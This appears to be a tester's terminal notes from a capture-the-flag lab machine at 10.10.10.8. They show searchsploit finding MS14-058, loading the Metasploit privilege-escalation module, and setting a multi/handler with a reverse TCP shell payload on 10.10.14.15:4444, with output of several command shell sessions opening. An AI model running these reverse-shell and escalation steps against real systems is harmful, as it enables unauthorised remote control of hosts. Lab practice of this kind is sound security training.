hippoeug@kali:~$ searchsploit windows server 2012

Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)                                             | windows/local/46945.cpp


====
Google MS14-058, got metasploit module

hippoeug@kali:~$ msfconsole

msf5 > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms14_058_track_popup_menu) > 

==============
msf> use multi/handler (check)

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set payload windows/sghell/reverse_tcp
[-] The value specified for payload is not valid.
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf5 exploit(multi/handler) > 

=========================

change 39161 script to port 4444

msf5 exploit(multi/handler) > set lhost 10.10.14.15
lhost => 10.10.14.15
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.8
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.8:49186) at 2021-01-17 01:46:03 +0800
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.8
[*] Command shell session 2 opened (10.10.14.15:4444 -> 10.10.10.8:49187) at 2021-01-17 01:46:04 +0800
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.8
[*] Command shell session 3 opened (10.10.14.15:4444 -> 10.10.10.8:49188) at 2021-01-17 01:46:04 +0800
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.8

background
C:\Users\kostas\Desktop>background

Background session 3? [y/N]  y
msf5 exploit(multi/handler) > 


